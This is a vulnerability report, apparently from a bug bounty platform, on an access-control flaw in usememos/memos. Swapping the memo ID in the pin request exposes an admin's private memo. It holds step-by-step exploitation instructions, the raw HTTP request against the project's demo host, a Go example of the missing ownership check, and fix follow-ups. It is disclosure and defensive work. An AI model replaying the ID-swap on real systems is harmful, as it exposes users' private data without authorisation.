Privilege escalation: low-access user can view admin PRIVATE POST by using PIN functionality in usememos/memos
Reported on
Dec 29th 2022
Description
Due to a privilege escalation issue, a low-access user can view an admin's PRIVATE post by abusing the PIN functionality. The PIN functionality is used to pin a post to the top. Using a low-privilege account, an attacker can view other, higher-privilege users' PRIVATE posts: as per the flow, it does not pin the post to the top for the other user, but it does disclose the post data in the response.
Proof of Concept
1. Log in to the account of a low-privilege user [jack].
2. Try to pin any of your own posts.
3. Capture the request in Burp.
4. Replace the id in the request with the admin's ID, or brute force it, in the organizer endpoint [/api/memo/1032/organizer].
5. Send the request; the ADMIN's PRIVATE post data is visible in the response.
poc video: https://drive.google.com/file/d/1r-JX44Q69czNDXrDs4qXumY-f4NEYUb9/view?usp=share_link
Vulnerable Request:
POST /api/memo/1032/organizer HTTP/2
Host: demo.usememos.com
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 15
Referer: https://demo.usememos.com/
Origin: https://demo.usememos.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{"pinned":true}
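The server-side check whose absence the request above demonstrates, as an added example that is not the project's own code: a constructed in-memory store, an unchecked organizer update that mirrors the reported behaviour (any memo ID in the URL is updated and echoed back), and a hardened version that refuses to change or return a memo whose creator is not the authenticated caller. Memo, MemoStore, the Pin* functions and the user IDs are hypothetical names and sample data.

```go
package main

import "errors"

// Memo is a constructed stand-in for a memos post (hypothetical, not the project's type).
type Memo struct {
	ID, CreatorID int
	Visibility    string // "PRIVATE" in the reported case
	Content       string
	Pinned        bool
}

// MemoStore is an in-memory stand-in for the database table.
type MemoStore map[int]*Memo

var (
	ErrNotFound  = errors.New("memo not found")
	ErrForbidden = errors.New("memo belongs to another user")
)

// PinMemoUnchecked reproduces the reported behaviour: the organizer update runs on
// whatever memo ID the URL carries and echoes the memo back with no ownership check.
func PinMemoUnchecked(store MemoStore, memoID int, pinned bool) (*Memo, error) {
	m, ok := store[memoID]
	if !ok {
		return nil, ErrNotFound
	}
	m.Pinned = pinned
	return m, nil
}

// PinMemoChecked is the hardened form: the authenticated caller must be the memo's
// creator before organizer state is changed or any memo data is returned.
func PinMemoChecked(store MemoStore, callerID, memoID int, pinned bool) (*Memo, error) {
	m, ok := store[memoID]
	if !ok {
		return nil, ErrNotFound
	}
	if m.CreatorID != callerID {
		return nil, ErrForbidden // never return the memo body on this path
	}
	m.Pinned = pinned
	return m, nil
}

// NewSampleStore builds constructed test data: admin user 101 owns private memo 1032,
// low-privilege user 202 owns private memo 2048.
func NewSampleStore() MemoStore {
	return MemoStore{
		1032: {ID: 1032, CreatorID: 101, Visibility: "PRIVATE", Content: "admin-only note"},
		2048: {ID: 2048, CreatorID: 202, Visibility: "PRIVATE", Content: "jack's own note"},
	}
}
```

Returning ErrForbidden (or a not-found response, to avoid confirming the ID exists) before the update is what keeps a guessed or brute-forced memo ID from leaking content.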
Impact
An attacker can view another, higher-privilege user's (admin's) PRIVATE post by using the PIN functionality.
Occurrences
Hello,
I have retested the issue on the latest version "memos v0.12.2"; the issue is not fixed yet.
Hello Team,
The issue has been fixed in the new version. Tested in 0.14.2.
Any updates on the CVE? It has not been assigned yet.
Thanks